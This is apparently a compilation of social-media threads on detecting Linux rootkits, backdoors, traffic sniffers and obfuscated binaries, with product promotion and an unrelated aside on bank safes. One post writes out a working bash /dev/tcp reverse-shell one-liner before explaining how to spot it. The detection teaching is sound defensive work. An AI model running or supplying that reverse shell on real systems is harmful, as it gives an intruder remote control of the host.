@Phrack had a great article on leaked North Korean APT operations, including a Linux stealth rootkit with backdoor. I took a look at this backdoor and and wanted to share detection tips. Full article at the end of this thread.
First, this rootkit is based on the khook library. This is a common rootkit base that allows full stealth for processes, network connections, files, etc. This is what @SandflySecurity sees when the rootkit is active. It's only stealthy if you aren't looking!

Since I apparently have so many safe fans, let's talk about my favorite safe type: Mosler Round Doors. They are absolute tanks with interesting features.
Mosler made excellent vaults and safes of superior security and design. The round doors are my favorite as they are the absolute strongest design. The door rotates and locks into lugs when you turn the T handle. The bolts just keep the door from spinning unlocked.

I recommend placing a 24/7 monitored smoke alarm above your safe. Cutting tools make a lot of smoke and this would set off the alarm and get help dispatched while scaring off attackers. Here is a thread of burglarized safe photos I've seen or were taken by others with advice.

https://twitter.com/qualadder/status/1954183677467869408

ISM Jeweler's safe on display floor of safe company. Attacked with oxyfuel torch. This is Hollywood tier non-sense and would never work on this type of safe.

The SCTP protocol on Linux provides a reliable and stealthy way to access Linux. In this thread I'm going to demonstrate a simple SCTP backdoor and how it can be missed by security teams. Then I'll show you how to look for this kind of activity. SCTP is a protocol mainly used for telcos. It provides reliable transport like TCP, but is not TCP. Be aware that network monitoring may not be paying close attention to SCTP and packet filters can be mis-configured to not block it.

The /proc/net/packet file on Linux shows you all open raw sockets that are grabbing network traffic. I'm going to show you what is in this file and provide a script that lists all processes sniffing traffic to help find malicious sniffers.
The /proc/net directory contains files that shows protocol use on Linux. The /proc/net/packet file shows you all open raw/packet sockets which means the process is sniffing traffic. The file shows you open inodes and who owns them, but doesn't list the process doing the deed.

This new Linux script from THC will encrypt and obfuscate any executable or script to hide from on-disk detection. I'm going to show you how to detect it with command line tools in this thread.

github.com/hackerschoice/… First, it only encrypts the binary at rest on disk. It is not encrypting the running process. This will evade legacy file scanning with YARA, etc. that is unreliable on Linux and I don't recommend using. The running process has no encryption so that is our detection target.

It is a total myth that you need agents on Linux to find attackers. It can all be done in user space and there is no reason to risk system stability doing kernel telemetry science projects across your org. Thread... First, people think attackers always deploy stealth rootkits on Linux, but this is absolutely not the case. Most attacks are plainly obvious, but many are not found because nobody is looking. Kernel monitoring offers no advantage in finding typical attack patterns.

Detecting stealth rootkits on Linux can be done from the command line. The secret is to ask the same question multiple ways to make sure all answers agree.

Let's find a directory from the Reptile stealth rootkit on Linux with link checks.

h/t @hal_pomeranz for this method. When you run a rootkit like Reptile, they often come with the ability to hide a directory if named a certain way. Any directory with the name "reptile" in it will be hidden with this rootkit as you see below under /lib/udev.

One of my favorite reverse shells for Linux is this:

bash -i >& /dev/tcp/IP_ADDRESS/PORT 0>&1

It's simple and works on just about every Linux system without elaborate payloads. Let's discuss how to investigate it. When you look at the process listing, you'll see a shell running. But the shell will have the interactive (-i) flag. In general, this isn't terribly common and is a good place to put your attention.

Report below on Ubiquiti compromise tactics and indicators. Includes OpenSSH backdoor/credential harvesting and dropped SSH key. Plus custom python based backdoors, iptables proxying and tampered binaries. Some thoughts.

ic3.gov/Media/News/202…
Using SSH with passwords means a trojanized binary will steal any credential of someone logging in. If you are not using public keys with SSH on Ubiquti and other devices (which prevents this), at least use a unique password with *each* device. Do not re-use passwords.

Thanks to one of my anonymous spies, I have run this Linux backdoor and @SandflySecurity easily found it. As discussed:

Process masquerading (renames itself [syslogd])
Opens raw UDP socket for comms
Impersonates kernel thread
Waits for instructions

More details in thread...

https://twitter.com/haxrob/status/1762821513680732222

As disclosed, it runs as [syslogd] after exec. This is easily seen with a ps -auxwf command that it is sitting out all alone and not part of the main [kthreadd] process PID 2.

ps -auxwf is your friend.

The translated Ukrainian report contains more details on these attacks. Let's go over them in this thread. @SandflySecurity can find many of these tactics out of the box right now.

https://twitter.com/BleepinComputer/status/1713979860404576348

Backdoor PAM authentication and grab passwords used to login. The stolen passwords are dropped in this file with simple XOR encryption:

/lib/libc.so.7

I don't like seeing weird files under /lib directories. Here we flag a standard ELF trying to hide as a shared object variant.

This is a great write-up from @Mandiant about a Fortinet attack and evasive backdoor. The backdoor uses port knocking and IP tables forwarding reminiscent of the BPFDoor malware we wrote about last year.

mandiant.com/resources/blog… FYI, agentless @SandflySecurity can run on many embedded and IoT devices instantly where other EDRs can't. We do this today and you can use our free license to check your systems.

"Sandfly is where agents can't be."

sandflysecurity.com/get-sandfly/

I asked ChatGPT to analyze a suspicious Linux process masquerading as the "date" command. However I had it do so in the style of WOPR from WarGames. It provided an excellent analysis based on the raw data from @SandflySecurity along with some guidance. Thread... The "date" command was flagged on a Linux host. I removed the explanation why it was detected so we could see what ChatGPT could make of it as a forensic analyst without any help. The initial observations are an excellent starting point for a Linux investigation:

Let's have ChatGPT give an opinion on a masquerading Linux process that was detected hiding on a system. I'll feed it the JSON with no other hints other than the data @SandflySecurity provided. ChatGPT summarizes the data, and even pulls out that the process deleted flag is set to true so it's masquerading and also deleted itself to hide.

ChatGPT helping investigate a suspicious Linux kernel module suspected of being a rootkit. I ask it to parse the JSON and it identifies the key fields. I ask it whether this kernel module called "Diamorphine" that was found is suspicious. The answer is concise and correct. It's cribbing our explanation a little, but still augmented with other data so we'll let it go.

I have been using #ChatGPT to help with Linux forensic investigations. It is an incredibly useful tool when guided with a little knowledge. In this thread I'm going to demonstrate how to investigate a suspicious process with SCTP sockets operating using @SandflySecurity First we'll paste in the raw event JSON and ask it to interpret it. ChatGPT does a great job understanding the fields without any prompting. It knows a security tool generated it and identifies key fields rapidly.

I have been using #ChatGPT to help with Linux forensic investigations. It is an incredibly useful tool when guided with a little knowledge. In this thread I'm going to demonstrate how to investigate a suspicious process with SCTP sockets operating using @SandflySecurity First we'll paste in the raw event JSON and ask it to interpret it. ChatGPT does a great job understanding the fields without any prompting. It knows a security tool generated it and identifies key fields rapidly.

Sandfly users (even free users) can enable the following incident response checks to flag processes running as sniffers. It will easily find #BPFdoor. Here's how in this thread: We have checks for sniffer activity in the incident response modules. They are not run by default as they can be noisy at times, but we do have a tuned version that is not noisy. Select the hosts you want scanned, then in sandfly selection use the filter to find "sniffer".

I looked at the sources for #BPFdoor and ran @SandflySecurity against the binary. We could find this since at least 1.x of our product. Here is a run down of what it is doing.

https://twitter.com/GossiTheDog/status/1522964028284411907

#BPFdoor uses eBPF to sniff traffic. It can bypass firewall rules to see packets. When it starts it writes to /var/run/haldrund.pid which is obfuscated as hex in the code. It also masquerades its name using a number of pre-defined command line values below:

People are asking me to post hashes about this Linux malware we came across. No. Using hashes for finding Linux malware doesn't work and are easily altered. Look for tactics instead. Here are some tactics to use in this thread.

https://twitter.com/CraigHRowland/status/1422009387686645761

Can you see the /etc/ld.so.preload file? Can you read it with /bin/cat or see it with the /bin/ls command? If you are being stopped from doing this then you have ld preload malware stopping you.